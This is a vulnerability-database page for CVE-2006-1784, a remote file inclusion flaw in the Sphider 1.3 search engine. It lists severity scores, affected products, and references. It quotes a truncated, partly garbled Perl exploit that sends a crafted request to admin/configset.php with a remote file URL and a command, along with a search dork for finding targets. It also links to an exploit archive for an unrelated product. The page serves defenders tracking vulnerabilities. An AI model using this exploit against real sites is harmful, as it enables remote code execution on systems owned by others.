CVE-2006-1784
published 2006-04-13CVE-2006-1784: PHP remote file inclusion vulnerability in admin/configset.php in Sphider 1.3 and earlier, when register_globals is disabled, allows remote attackers to…
PriorityP342medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
7.81%
93.9th percentile
PHP remote file inclusion vulnerability in admin/configset.php in Sphider 1.3 and earlier, when register_globals is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the settings_dir parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sphider | sphider | — | — |
| sphider | sphider | — | — |
| sphider | sphider | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
raydium svn 309 - Multiple Vulnerabilities
exploitdb·2006-05-14
CVE-2006-2412 raydium svn 309 - Multiple Vulnerabilities
raydium svn 309 - Multiple Vulnerabilities
---
# Raydium <= SVN 309 Multiple Remote Vulnerabilities Exploit
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1784.zip (05132006-raydiumx.zip)
Exploit-DB
Sphider 1.3 - 'configset.php' Remote File Inclusion
exploitdb·2006-04-12
CVE-2006-1784 Sphider 1.3 - 'configset.php' Remote File Inclusion
Sphider 1.3 - 'configset.php' Remote File Inclusion
---
#!/usr/bin/perl
use IO::Socket;
print "\r\nSphider works with register_globals = On & allow_url_fopen = On\r\n";
print "by rgod rgodautisticiorg\r\n";
print "site: http://retrogod.altervista.org\r\n";
print "\r\ndork: \"powered by sphider\"\r\n";
sub main::urlEncode {
my ($string) = @_;
$string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
#$string# =~ tr/.//;
return $string;
}
$serv=$ARGV[0];
$path=$ARGV[1];
$loc=urlEncode($ARGV[2]);
$cmd=""; for ($i=3; $i\r\n";
exit();
}
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)")
or die "[+] Connecting ... Could not connect to host.\n\n";
print $sock "GET ".$path."admin/configset.php?cmd=".$cmd."&settings_dir=".$loc." HTTP/1.0\r\n";
print $sock "H
No writeups or analysis indexed.
http://secunia.com/advisories/19642http://www.securityfocus.com/bid/17514http://www.vupen.com/english/advisories/2006/1341https://exchange.xforce.ibmcloud.com/vulnerabilities/25780https://www.exploit-db.com/exploits/1665http://secunia.com/advisories/19642http://www.securityfocus.com/bid/17514http://www.vupen.com/english/advisories/2006/1341https://exchange.xforce.ibmcloud.com/vulnerabilities/25780https://www.exploit-db.com/exploits/1665
2006-04-13
Published